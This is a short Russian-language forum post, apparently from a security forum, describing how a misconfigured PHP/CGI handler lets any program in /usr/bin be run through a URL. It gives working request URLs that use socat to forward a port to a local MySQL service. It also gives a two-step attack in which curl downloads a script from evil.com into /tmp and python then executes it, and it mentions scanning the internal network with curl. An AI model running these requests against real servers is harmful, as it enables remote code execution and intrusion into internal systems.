Показать сообщение отдельно
Старый 06.06.2013, 12:15   #9
oRb
 
Аватар для oRb
 
Регистрация: 01.07.2010
Сообщений: 319
Репутация: 138
По умолчанию

Есть еще 1 фишка. При такой настройке можно выполнять любую программу из /usr/bin/, а не только php. У меня, к примеру, там лежит socat.
Захожу http://localhost/phppath/socat?tcp-listen:31339+tcp-connect:localhost:3306
Получаю проброшенный порт

Еще можно сканить локальную сетку, если установлен curl.

UPD:
можно качнуть со своего сервера подготовленный скрипт, а вторым запросом его уже выполнить. Например так:
http://localhost/phppath/curl?-o+/tmp/py+evil.com/script
http://localhost/phppath/python?/tmp/py
__________________
Не оказываю никаких услуг.
I don't provide any services.

Последний раз редактировалось oRb; 06.06.2013 в 12:27..
oRb вне форума   Ответить с цитированием